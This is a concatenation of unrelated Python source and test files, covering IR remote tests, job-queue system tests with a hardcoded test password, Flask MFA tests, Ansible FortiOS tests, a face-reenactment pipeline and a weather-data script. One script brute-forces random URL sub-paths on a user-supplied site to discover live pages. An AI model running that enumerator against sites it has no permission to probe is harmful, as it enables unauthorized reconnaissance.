'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_move_right_command(self):
command = 'MOVE_RIGHT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_number_channel_345_command(self):
command = 'CHANNEL'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_3'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_4'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_5')]
result = self.__ir_sender.send(command, '345')
self.assertEqual(expected, result)
def test_number_channel_123_command(self):
command = 'CHANNEL'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_1'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_2'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_3')]
result = self.__ir_sender.send(command, '123')
self.assertEqual(expected, result)
def test_number_channel_8_command(self):
command = 'CHANNEL'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_8')]
result = self.__ir_sender.send(command, '8')
self.assertEqual(expected, result)
|
import pytest
import requests
from .utils import SECRET_KEY
from microq_admin.utils import load_config
from microq_admin.tools import delete_claims
from microq_admin.projectsgenerator.qsmrprojects import (
create_project, delete_project, is_project
)
from microq_admin.jobsgenerator.qsmrjobs import (
main as jobsmain,
)
CONFIG_FILE = '/tmp/test_qsmr_snapshot_config.conf'
JOBS_FILE = '/tmp/test_qsmr_snapshot_jobs.txt'
ODIN_PROJECT = 'myodinproject'
WORKER = 'claimtestsworker'
def make_config(odinurl, microqurl):
cfg = (
'JOB_API_ROOT={}/rest_api\n'.format(microqurl)
+ 'JOB_API_USERNAME=admin\n'
'JOB_API_PASSWORD=sqrrl\n'
'ODIN_API_ROOT={}\n'.format(odinurl)
+ f'ODIN_SECRET={SECRET_KEY}\n'
)
with open(CONFIG_FILE, 'w') as out:
out.write(cfg)
def make_projects(jobsproject, nojobsproject, config):
# No conflict with other tests
assert not is_project(jobsproject, config)
assert not is_project(nojobsproject, config)
# Make projects
assert not create_project(jobsproject, config)
assert not create_project(nojobsproject, config)
def make_jobs(jobsproject, number_of_jobs=6):
scanids = [str(v) for v in range(number_of_jobs)]
with open(JOBS_FILE, 'w') as out:
out.write('\n'.join(scanids) + '\n')
assert not jobsmain([
jobsproject, ODIN_PROJECT, '--freq-mode', '1', '--jobs-file',
JOBS_FILE,
], CONFIG_FILE)
def claim_jobs(jobsproject, config, number_of_jobs=3):
claimurl = "{}/v4/{}/jobs/{}/claim".format(
config['JOB_API_ROOT'], jobsproject, "{}",
)
fetchurl = "{}/v4/{}/jobs/fetch".format(
config['JOB_API_ROOT'], jobsproject,
)
auth = (config['JOB_API_USERNAME'], config['JOB_API_PASSWORD'])
jobids = []
for _ in range(number_of_jobs):
response = requests.get(fetchurl, auth=auth)
response.raise_for_status()
jobid = response.json()['Job']['JobID']
response = requests.put(
claimurl.format(jobid), auth=auth, json={'Worker': WORKER},
)
response.raise_for_status()
jobids.append(jobid)
return jobids
def fail_job(jobsproject, failid, config):
url = "{}/v4/{}/jobs/{}/status".format(
config['JOB_API_ROOT'], jobsproject, failid,
)
auth = (config['JOB_API_USERNAME'], config['JOB_API_PASSWORD'])
response = requests.put(url, auth=auth, json={'Status': 'FAILED'})
response.raise_for_status()
@pytest.fixture(scope='function')
def delete_claim_projects(odin_and_microq):
make_config(*odin_and_microq)
config = load_config(CONFIG_FILE)
jobsproject = "claimsjobsproject"
nojobsproject = "claimsnojobsproject"
make_projects(jobsproject, nojobsproject, config)
make_jobs(jobsproject)
jobids = claim_jobs(jobsproject, config)
assert jobids
fail_job(jobsproject, jobids[0], config)
yield jobsproject, nojobsproject
# Cleanup
assert not delete_project(jobsproject, config)
assert not delete_project(nojobsproject, config)
def get_jobs_counts(project):
config = load_config(CONFIG_FILE)
url = "{}/v4/{}/jobs/count".format(config['JOB_API_ROOT'], project)
response = requests.get(url)
response.raise_for_status()
claimed = response.json()['Counts'][0]['JobsClaimed']
failed = response.json()['Counts'][0]['JobsFailed']
url = "{}/v4/{}/jobs?status=available".format(
config['JOB_API_ROOT'], project
)
response = requests.get(url)
response.raise_for_status()
available = len(response.json()['Jobs'])
return available, claimed, failed
@pytest.mark.system
def test_bad_project_name(delete_claim_projects):
assert (
delete_claims.main(['claimsbadproject'], config_file=CONFIG_FILE)
== "No project called claimsbadproject"
)
@pytest.mark.system
def test_empty_project(delete_claim_projects):
_, nojobsproject = delete_claim_projects
assert (
delete_claims.main([nojobsproject], config_file=CONFIG_FILE)
== "Project {} has no jobs".format(nojobsproject)
)
@pytest.mark.system
def test_make_failed_available(delete_claim_projects):
project, _ = delete_claim_projects
# Available, Claimed + Failed, Failed
# Total of six jobs
assert get_jobs_counts(project) == (3, 3, 1)
assert not delete_claims.main([project], config_file=CONFIG_FILE)
# Avaialbe is only a status so it's still 3 (claiming sets a status)
# Deleting claim does not change status
# The previously claimed deleted job is no longer claimed but still deleted
# Total of 6 jobs
assert get_jobs_counts(project) == (3, 2, 1)
@pytest.mark.system
def test_make_non_finished_avaialable(delete_claim_projects):
project, _ = delete_claim_projects
# Available, Claimed + Failed, Failed
# Total of six jobs
assert get_jobs_counts(project) == (3, 3, 1)
assert not delete_claims.main(
[project, '--force'], config_file=CONFIG_FILE,
)
# Avaialbe is only a status so it's still 3 (claiming sets a status)
# Deleting claim does not change status
# The previously claimed jobs (deletedd or not) are no long claimed
# The failed still has that status
# Total of six jobs
assert get_jobs_counts(project) == (3, 0, 1)
|
import pyotp
from flask import url_for
from itsdangerous import Signer
from app.config import FLASK_SECRET
from app.extensions import db
from app.models import User
def test_auth_mfa_success(flask_client):
user = User.create(
email="a@b.c",
password="password",
name="Test User",
activated=True,
enable_otp=True,
otp_secret="base32secret3232",
)
db.session.commit()
totp = pyotp.TOTP(user.otp_secret)
s = Signer(FLASK_SECRET)
mfa_key = s.sign(str(user.id))
r = flask_client.post(
url_for("api.auth_mfa"),
json={"mfa_token": totp.now(), "mfa_key": mfa_key, "device": "Test Device"},
)
assert r.status_code == 200
assert r.json["api_key"]
assert r.json["email"]
assert r.json["name"] == "Test User"
def test_auth_wrong_mfa_key(flask_client):
user = User.create(
email="a@b.c",
password="password",
name="Test User",
activated=True,
enable_otp=True,
otp_secret="base32secret3232",
)
db.session.commit()
totp = pyotp.TOTP(user.otp_secret)
r = flask_client.post(
url_for("api.auth_mfa"),
json={
"mfa_token": totp.now(),
"mfa_key": "wrong mfa key",
"device": "Test Device",
},
)
assert r.status_code == 400
assert r.json["error"]
|
import string
import random
import urllib.request
import requests
import timeit
def script():
start = timeit.default_timer()
print("Welcome to ")
print("""\
▓█████ ███▄ █ ██████ ▄▄▄█████▓ ██▒ █▓ ▄▄▄
▓█ ▀ ██ ▀█ █ ▒ ██ ▒ ▓ ██▒ ▓▒ ▓██░ █▒▒ ████▄
▒███ ▓ ██ ▀█ ██▒░ ▓██▄ ▒ ▓██░ ▒░ ▓██ █▒░▒ ██ ▀█▄
▒▓█ ▄▓ ██▒ ▐▌██▒ ▒ ██▒ ░ ▓██▓ ░ ▒██ █░░░ ██▄▄▄▄██
░▒████▒ ██░ ▓██░▒█ █████▒▒ ▒██▒ ░ ▒▀█░ ▓█ ▓██▒
░░ ▒░ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ▐░ ▒▒ ▓▒█░
░ ░ ░ ░░ ░ ▒░░ ░▒ ░ ░ ░ ░ ░░ ▒ ▒▒ ░
░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒
░ ░ ░ ░ ░ ░ ░
""")
print("----------------------------------------------------------")
print("Note: This tool can only be used to enumerate websites with alphanumeric sub-pathes.\n Eg:www.abc.com/sd4g5\n\twww.bcd.com/ui8")
print("----------------------------------------------------------")
a=input("Enter URL with / and scheme included \n\t\teg: https://www.abcd.com/ : ").lstrip().rstrip()
n=int(input("Enter Limit of Enumeration : "))
k=int(input("Enter length of sub path : "))
print("----------------------------------------------------------")
fi=open('link.txt','a+')
for i in range(n):
f=''.join(random.choices(string.ascii_lowercase +
string.digits, k=k))
fi.write(a+f+"\n")
fi.close()
open('output.txt','a').writelines(set(open('link.txt','r').readlines()))
open('link.txt', 'w').close()
print("Output saved : output.txt")
def url_check(urls):
for url in urls:
try:
resp = requests.get(url)
if resp.status_code == 200:
redirect=len(resp.history)
print("----------------------------------------------------------")
print(f"Redirection count : {redirect}")
print("URL : ",url)
if redirect==0:
fin.write(url+"\n")
res = urllib.request.urlopen(url)
finalurl = res.geturl()
print("Final URL : ",finalurl)
for resp in resp.history:
print(resp.status_code, resp.url)
print("----------------------------------------------------------")
print("\n")
else:
print(f"{url} is Not Valid")
except:
raise Exception(f"{url} is down!\n Program Stopped!")
f2=open("output.txt","r")
urls=list(f2.readlines())
for index, item in enumerate(urls):
item = item.strip(string.punctuation).strip()
if "http" not in item:
item = "http://" + item
urls[index] = item
print("----------------------------------------------------------")
print("_________________________URL List_________________________ \n",urls)
try:
fin=open("final.txt","a+")
url_check(urls)
fin.close()
f2.close()
open('output.txt', 'w').close()
print("----------------------------------------------------------")
print("Process completed, Final Result : final.txt")
stop = timeit.default_timer()
execution_time = stop - start
print(f"Program Executed in {str(execution_time)} seconds") # It returns time in seconds
print("----------------------------------------------------------")
except Exception as e:
print(e)
script()
# For running the Script x no. of times, in that case just comment out previous line
# for i in range(x):
# script()
# time.sleep(5)
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_endpoint_control_settings
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_endpoint_control_settings.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_endpoint_control_settings_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_endpoint_control_settings_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_endpoint_control_settings_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_endpoint_control_settings_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'random_attribute_not_valid': 'tag',
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
# monte um dicionario com as seguintes chaves = lista, somatorio, tamanho, maior valor, menor valor
|
from website_manager import WebsiteManager
class NewsManager:
def __init__(self):
self.website_manager = WebsiteManager()
self.titles = []
# Find the titles of several news websites
def find_titles(self, urls):
titles = []
for url in urls:
articles_titles = self.website_manager.get_articles_titles(url)
titles.extend(articles_titles)
self.titles = titles
# Print the local self.titles array members
def print_titles(self):
print("The titles found are:")
print("---------------------")
for title in self.titles:
print(title)
print("----------------------")
|
import os
import time
from pathlib import Path
from typing import List, Dict
import cv2
import numpy as np
from decord import VideoReader
from decord import cpu
from appearance_module.base import AppearanceModel
from detection_module.detector.base import Detector
from interfaces.face import Face
from interfaces.frame import Frame
from interfaces.system_config import SystemConfig
from interfaces.system_result import SystemResult
from landmark_module.base import LandmarkModel
from logger import Logger
from reenactment_module.base import ReenactmentModel
from smile_module.base import SmileModel
from tracking_module.base import TrackingModel
from utils.common import mkdir
from utils.face import compute_eye_score, COMPARE_SCORE_WEIGHTS
class SystemWrapper:
def __init__(self, config: SystemConfig,
tracking_model: TrackingModel,
detection_model: Detector,
appearance_model: AppearanceModel,
smile_model: SmileModel,
landmark_model: LandmarkModel,
reenactment_model: ReenactmentModel
):
self.config = config
self._tracking_model = tracking_model
self._detection_model = detection_model
self._appearance_model = appearance_model
self._smile_model = smile_model
self._landmark_model = landmark_model
self._reenactment_model = reenactment_model
@staticmethod
def _compute_compare_score(face_score: float, similarity_score: float) -> float:
w_face_score, w_similarity_score = \
COMPARE_SCORE_WEIGHTS['face_score'], COMPARE_SCORE_WEIGHTS['similarity_score']
compare_score = (
w_face_score * face_score + w_similarity_score * similarity_score
) / (w_face_score + w_similarity_score)
return compare_score
@staticmethod
def _get_best_face(face_ref: Face, list_faces: List[Face]) -> Face:
if face_ref.facial_landmarks is None:
max_index = np.argmax([face.face_score for face in list_faces])
return list_faces[max_index]
face_ref_mask = np.zeros(face_ref.frame_size)
cv2.fillConvexPoly(face_ref_mask, cv2.convexHull(face_ref.facial_landmarks), 255)
best_face_info = face_ref
best_compare_score = SystemWrapper._compute_compare_score(face_score=best_face_info.face_score,
similarity_score=1.0)
for face_info in list_faces:
if face_info.facial_landmarks is None:
continue
face_info_mask = np.zeros(face_info.frame_size)
cv2.fillConvexPoly(face_info_mask, cv2.convexHull(face_info.facial_landmarks), 255)
# Compute similarity between face reference and other faces
dice_similarity_score = np.sum(face_ref_mask[face_info_mask == 255]) * 2.0 / (np.sum(face_ref_mask) +
np.sum(face_info_mask))
compare_score = SystemWrapper._compute_compare_score(face_score=face_info.face_score,
similarity_score=dice_similarity_score)
if compare_score > best_compare_score:
best_face_info = face_info
return best_face_info
def _compute_scores(self, frame_info: Frame, tracked_faces: List[Face], dict_faces_info: Dict) -> None:
frame_info.faces = tracked_faces
for face_info in tracked_faces:
face_info.frame_id = frame_info.id
face_info.frame_size = frame_info.img_size
# Assign value to dict
dict_faces_info[str(face_info.id)] = dict_faces_info.get(str(face_info.id), []) + [face_info]
# 1. Get bounding box information -> Convert to rectangle
x_min, y_min, x_max, y_max = face_info.bbox.to_rect()
# 2. Add margin to bounding box
margin = self.config.margin
x_min = np.maximum(x_min - margin, 0)
y_min = np.maximum(y_min - margin, 0)
x_max = np.minimum(x_max + margin, frame_info.img_size[1])
y_max = np.minimum(y_max + margin, frame_info.img_size[0])
rect = np.array([x_min, y_min, x_max, y_max], dtype=np.int32) # New rectangle
# 3. Crop face
cropped_face = frame_info.img[rect[1]:rect[3], rect[0]:rect[2], :]
cropped_face_copy = cropped_face.copy()
face_info.face_img = cropped_face
# 4. Compute appearance score
eye_visible, appearance_score = self._appearance_model.compute_score(cropped_face=cropped_face_copy)
# 5. Detect 68 facial landmark => if eye_visible, compute eye score
landmarks = self._landmark_model.detect(face_info=face_info, frame=frame_info.img)
eye_score = compute_eye_score(landmarks, self.config.ear_threshold)
# 6. Compute smile score
smile_score = self._smile_model.compute_score(cropped_face=cropped_face_copy)
face_info.facial_landmarks = landmarks
face_info.appearance_score = appearance_score
face_info.eye_score = eye_score
face_info.smile_score = smile_score
face_info.compute_face_score()
# 7. Add to frame score
frame_info.total_score += face_info.face_score
def get_result(self, video_path) -> SystemResult:
np.random.seed(0)
start_time = time.time()
dir_name = time.strftime('%Y_%m_%d_%H_%M', time.localtime(start_time))
inference_dir = os.path.join(self.config.inference_root_path, dir_name)
mkdir(inference_dir)
video_name = Path(video_path).stem
logger = Logger(log_file_root_path=inference_dir, log_name=video_name, module_name='MOT')
video_reader = VideoReader(video_path, ctx=cpu(0))
total_frames = len(video_reader)
# Log info
logger.info("Detection module name: {}".format(self._detection_model.name))
logger.info("Tracking module name: {}".format(self._tracking_model.name))
logger.info("Appearance module name: {}".format(self._appearance_model.name))
logger.info("Smile module name: {}".format(self._smile_model.name))
logger.info("Landmark module name: {}".format(self._landmark_model.name))
logger.info("Reenactment module name: {}".format(self._reenactment_model.name))
logger.info("Total {} frames:".format(total_frames))
# Extract all information
counter = 0
best_frame_info = None
list_frames_info = []
dict_faces_info = dict()
while counter < total_frames:
img = video_reader[counter].asnumpy()
if counter % self.config.frame_interval != 0:
counter += 1
continue
# Init frame info
frame_info = Frame(frame_id=counter, img=img)
logger.info("Frame {}:".format(counter))
# 1. Detect face
detection_start_time = time.time()
faces: List[Face] = self._detection_model.detect_face(frame=img)
logger.info("Detect {} face(s) cost time: {}s".format(len(faces),
round(time.time() - detection_start_time, 3)))
# 2. Track face
tracking_start_time = time.time()
tracked_faces: List[Face] = self._tracking_model.update(list_faces=faces, img_size=frame_info.img_size,
predict_num=self.config.frame_interval)
logger.info("Track face(s) cost time: {}s".format(round(time.time() - tracking_start_time), 3))
# 3. Compute face scores and frame score
score_computation_time = time.time()
self._compute_scores(frame_info=frame_info, tracked_faces=tracked_faces, dict_faces_info=dict_faces_info)
logger.info("Compute face score(s) cost time: {}s".format(round(time.time() - score_computation_time), 3))
# 4. Check whether it should be best frame
if best_frame_info is None or frame_info.total_score > best_frame_info.total_score:
best_frame_info = frame_info
list_frames_info.append(frame_info)
counter += 1
# Face reenactment
logger.info("Key frame at frame id: {}".format(best_frame_info.id))
result = SystemResult()
result.key_frame = best_frame_info.img
rendered_img = best_frame_info.img.copy()
reenactment_time = time.time()
for face_info in best_frame_info.faces:
# Pick the best moment frame for that face
best_face_info: Face = self._get_best_face(face_ref=face_info,
list_faces=dict_faces_info.get(str(face_info.id)))
source_img = list_frames_info[best_face_info.frame_id].img
is_rendered, rendered_img = self._reenactment_model.modify(source=best_face_info,
target=face_info,
source_img=source_img,
target_img=rendered_img)
if not is_rendered:
continue
# Get face was rendered
x_min, y_min, x_max, y_max = face_info.bbox.to_rect().astype(np.int32)
rendered_face = rendered_img[y_min: y_max, x_min: x_max]
# Draw landmarks
source_landmarks = source_img.copy()
target_landmarks = best_frame_info.img.copy()
for pt in best_face_info.facial_landmarks:
cv2.circle(source_landmarks, (pt[0], pt[1]), 2, (0, 0, 255), -1)
for pt in face_info.facial_landmarks:
cv2.circle(target_landmarks, (pt[0], pt[1]), 2, (0, 0, 255), -1)
target_landmarks = target_landmarks[y_min: y_max, x_min: x_max]
x_min, y_min, x_max, y_max = best_face_info.bbox.to_rect().astype(np.int32)
source_landmarks = source_landmarks[y_min: y_max, x_min: x_max]
# Write result
result.source_faces[str(face_info.id)] = best_face_info.face_img
result.target_faces[str(face_info.id)] = face_info.face_img
result.source_landmarks[str(face_info.id)] = source_landmarks
result.target_landmarks[str(face_info.id)] = target_landmarks
result.rendered_faces[str(face_info.id)] = rendered_face
# Final image
result.result_img = rendered_img
logger.info("Reenactment cost time: {}s".format(round(time.time() - reenactment_time), 3))
# Save result
cv2.imwrite(os.path.join(inference_dir, 'key_frame.png'), cv2.cvtColor(result.key_frame, cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(inference_dir, 'result.png'), cv2.cvtColor(result.result_img, cv2.COLOR_BGR2RGB))
for face_id in result.rendered_faces:
face_dir = os.path.join(inference_dir, face_id)
mkdir(face_dir)
cv2.imwrite(os.path.join(face_dir, 'source.png'),
cv2.cvtColor(result.source_faces[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'target.png'),
cv2.cvtColor(result.target_faces[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'source_landmarks.png'),
cv2.cvtColor(result.source_landmarks[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'target_landmarks.png'),
cv2.cvtColor(result.target_landmarks[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'rendered.png'),
cv2.cvtColor(result.rendered_faces[face_id], cv2.COLOR_BGR2RGB))
logger.info("Total cost time: {}s".format(round(time.time() - start_time), 3))
self._tracking_model.reset()
return result
|
"""Extract HRRR radiation data for storage with COOP data.
Run once at 10 PM to snag calendar day stations. (RUN_50_AFTER.sh)
Run again with RUN_NOON.sh when the regular estimator runs
"""
from __future__ import print_function
import datetime
import os
import sys
import pytz
import pyproj
import numpy as np
import pygrib
from pyiem.util import get_dbconn, utc
P4326 = pyproj.Proj(init="epsg:4326")
LCC = pyproj.Proj(("+lon_0=-97.5 +y_0=0.0 +R=6367470. +proj=lcc +x_0=0.0"
" +units=m +lat_2=38.5 +lat_1=38.5 +lat_0=38.5"))
SWITCH_DATE = utc(2014, 10, 10, 20)
def run(ts):
"""Process data for this timestamp"""
pgconn = get_dbconn('coop')
cursor = pgconn.cursor()
cursor2 = pgconn.cursor()
total = None
xaxis = None
yaxis = None
for hr in range(5, 23): # Only need 5 AM to 10 PM for solar
utcts = ts.replace(hour=hr).astimezone(pytz.UTC)
fn = utcts.strftime(("/mesonet/ARCHIVE/data/%Y/%m/%d/model/hrrr/%H/"
"hrrr.t%Hz.3kmf00.grib2"))
if not os.path.isfile(fn):
continue
grbs = pygrib.open(fn)
try:
if utcts >= SWITCH_DATE:
grb = grbs.select(name='Downward short-wave radiation flux')
else:
grb = grbs.select(parameterNumber=192)
except ValueError:
# Don't complain about 10 PM file, which may not be complete yet
if utcts.hour not in [3, 4]:
print('hrrr_solarrad.py %s had no solar rad' % (fn,))
continue
if not grb:
print('Could not find SWDOWN in HRR %s' % (fn,))
continue
g = grb[0]
if total is None:
total = g.values
lat1 = g['latitudeOfFirstGridPointInDegrees']
lon1 = g['longitudeOfFirstGridPointInDegrees']
llcrnrx, llcrnry = LCC(lon1, lat1)
nx = g['Nx']
ny = g['Ny']
dx = g['DxInMetres']
dy = g['DyInMetres']
xaxis = llcrnrx+dx*np.arange(nx)
yaxis = llcrnry+dy*np.arange(ny)
else:
total += g.values
if total is None:
print(('hrrr_solarrad.py found no HRRR data for %s'
) % (ts.strftime("%d %b %Y"), ))
return
# Total is the sum of the hourly values
# We want MJ day-1 m-2
total = (total * 3600.0) / 1000000.0
cursor.execute("""
SELECT station, ST_x(geom), ST_y(geom), temp24_hour from
alldata a JOIN stations t on
(a.station = t.id) where day = %s and network ~* 'CLIMATE'
""", (ts.strftime("%Y-%m-%d"), ))
for row in cursor:
(x, y) = LCC(row[1], row[2])
i = np.digitize([x], xaxis)[0]
j = np.digitize([y], yaxis)[0]
rad_mj = float(total[j, i])
if rad_mj < 0:
print('WHOA! Negative RAD: %.2f, station: %s' % (rad_mj, row[0]))
continue
# if our station is 12z, then this day's data goes into 'tomorrow'
# if our station is not, then this day is today
date2 = ts.strftime("%Y-%m-%d")
if row[3] in range(4, 13):
date2 = (ts + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
cursor2.execute("""
UPDATE alldata_""" + row[0][:2] + """ SET hrrr_srad = %s WHERE
day = %s and station = %s
""", (rad_mj, date2, row[0]))
cursor.close()
cursor2.close()
pgconn.commit()
pgconn.close()
def main(argv):
""" Do Something"""
if len(argv) == 4:
sts = utc(int(argv[1]), int(argv[2]), int(argv[3]), 12, 0)
sts = sts.astimezone(pytz.timezone("America/Chicago"))
run(sts)
